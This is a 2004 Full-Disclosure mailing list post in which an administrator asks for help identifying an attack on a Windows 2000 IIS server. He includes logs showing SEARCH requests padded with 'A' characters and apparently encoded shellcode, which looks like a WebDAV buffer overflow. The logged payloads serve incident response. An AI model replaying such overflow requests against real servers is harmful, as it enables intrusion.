Full Disclosure mailing list archives
Exploit Identification Request
From: "System Administrator" <root () transientimages com>
Date: Thu, 29 Apr 2004 06:34:41 -0700
Folks : One of our external systems (W2k, fully patched all components - sp4, sql sp4, mdac sp3, post hotfixes, etc) is being hit by what appears to be a buffer overflow of IIS : 4096 bytes cycling in what appears to be an attempt to execute code. The probe starts by obtaining an index.asp page, and then drops a "SEARCH / 411 210 42" before dropping the "AAAAA<n>" string. I've checked the SEARCH unicode against google (nothing) and k- otic's current exploits (nada) and dsheild tables (nada). Can anyone assist in idenfification of the exploit\overrun attempt? Thanks, Oliver 2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) - 2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - - 2004-04-28 21:12:45 x.x.88.247 SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA?????????????????????????????????????####?????????? rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfd 2004-04-28 21:12:51 217.185.88.247 SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA?????????????????????????????????????####?????????? rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf 2004-04-28 21:13:01 217.185.198.113 GET /index.asp 200 0 189 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) - 2004-04-28 21:13:04 217.185.198.113 SEARCH / 411 210 42 - - 2004-04-28 21:13:27 217.185.198.113 SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA?????????????????????????????????????####?????????? rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Exploit Identification Request System Administrator (Apr 29)
- Re: Exploit Identification Request Cedric Blancher (Apr 29)
- Re: Exploit Identification Request Thorolf (Apr 29)
- <Possible follow-ups>
- Re: Exploit Identification Request Oliver Raymond (Apr 29)